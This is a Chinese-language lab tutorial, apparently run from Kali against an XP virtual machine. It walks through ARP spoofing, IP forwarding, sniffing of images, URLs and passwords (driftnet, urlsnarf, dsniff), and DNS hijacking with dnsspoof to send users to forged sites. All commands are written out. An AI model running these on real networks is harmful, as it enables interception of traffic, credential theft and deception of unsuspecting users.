天天看點

區域網路下ARP欺騙、嗅探,以及DNS欺騙

準備:kali、xp

kali ip:192.168.14.157

目标ip:192.168.14.158

目标網關:192.168.14.2

ARP欺騙:

arpspoof -t 目标ip -r 目标網關

指令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2

區域網路下ARP欺騙、嗅探,以及DNS欺騙

 我們可以看到xp認為網關的MAC位址和KAli是一樣的

顯示我們欺騙成功

但現在xp是不能上網的

kali 預設不會開啟流量轉發

區域網路下ARP欺騙、嗅探,以及DNS欺騙

我們在xp下是不能上網的

區域網路下ARP欺騙、嗅探,以及DNS欺騙

 打開流量轉發的功能:

檢視(預設kali沒有開啟流量轉發功能,值為0)

指令:cat /proc/sys/net/ipv4/ip_forward

區域網路下ARP欺騙、嗅探,以及DNS欺騙

預設值為0

開啟流量轉發

 指令:echo 1 > /proc/sys/net/ipv4/ip_forward

區域網路下ARP欺騙、嗅探,以及DNS欺騙

 我們回來看kali是否能上網

能上網

區域網路下ARP欺騙、嗅探,以及DNS欺騙

 網絡嗅探

竊取浏覽中的圖檔:

指令:driftnet -i eth0

會打開一個視窗

區域網路下ARP欺騙、嗅探,以及DNS欺騙

我們去xp浏覽網站

再看看效果

可以看到浏覽過的網頁照片都在這裡顯示

區域網路下ARP欺騙、嗅探,以及DNS欺騙

 還可以抓取聲音檔案

你也可以把圖檔放到一起,放到一個目錄下

建立目錄:

mkdir 目錄名

-例如 mkdir tempdir/ 

把抓的圖檔儲存到目錄:

-driftnet -i eth0 -a -d tempdir/ -s(聲音檔案)

抓傳輸過程浏覽的url:

指令:urlsnarf -i eth0

區域網路下ARP欺騙、嗅探,以及DNS欺騙

嗅探密碼:

指令:dsniff -i eth0 -m

區域網路下ARP欺騙、嗅探,以及DNS欺騙
區域網路下ARP欺騙、嗅探,以及DNS欺騙

DNS欺騙(域名劫持)

你也可以進行域名劫持,讓對方通路一個網站解析到不準确或者僞造的網站上

你需要自己配制欺騙的域名

本人沒有找到自帶的域名集

隻能自己編輯

格式:

僞造網站ip  *.baidu.com

僞造網站ip  *.google.com.hk

檢視:cat /usr/share/dsniff/dnsspoof.hosts

編輯:vi /usr/share/dsniff/dnsspoof.hosts

執行指令:dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts